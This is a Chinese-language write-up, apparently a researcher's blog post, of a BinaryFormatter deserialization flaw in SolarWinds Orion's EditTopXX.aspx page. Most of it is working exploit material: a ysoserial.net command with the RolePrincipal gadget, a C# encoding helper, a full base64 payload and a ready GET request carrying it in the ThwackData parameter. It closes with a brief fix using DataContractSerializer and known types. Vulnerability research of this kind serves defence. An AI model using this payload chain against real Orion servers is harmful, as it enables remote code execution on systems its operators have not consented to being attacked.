同样是使用了Serializer.Deserialize<T>(string serializedObject)
漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs
同样调用 binaryformatter
ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。
1ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "ping localhost -t"
然后编码
1using System;
2using System.IO;
3using System.Runtime.Serialization.Formatters.Binary;
4using System.Text;
5using System.Web;
6using System.Web.Mvc;
7
8namespace WebApplication1.Controllers
9{
10 public class HomeController : Controller
11 {
12 public ActionResult Index()
13 {
14 var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
15 "AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAANgFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUNIQXp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QndhVzVuSUd4dlkyRnNhRzl6ZENBdGRDSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL"));
16 Response.Write(payload);
17 return View();
18 }
19 }
20
21 public class Serializer
22 {
23 // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
24 public static string Serialize(object parameters)
25 {
26 string result;
27 using (MemoryStream memoryStream = new MemoryStream())
28 {
29 new BinaryFormatter().Serialize(memoryStream, parameters);
30 result = Base64Helper.Base64Encode(memoryStream.ToArray());
31 }
32
33 return result;
34 }
35
36 // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
37 public static T Deserialize<T>(string serializedObject)
38 {
39 T result;
40 using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
41 {
42 result = (T) ((object) new BinaryFormatter().Deserialize(stream));
43 }
44
45 return result;
46 }
47 }
48
49 internal class Base64Helper
50 {
51 // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
52 public static string Base64Encode(byte[] str)
53 {
54 return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
55 }
56
57 // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
58 public static byte[] Base64Decode(string str)
59 {
60 byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
61 return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
62 }
63 }
64}
构造请求如下
1http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1
RCE
问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。
改用DataContractSerializer处理序列化,并限定KnowsType。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。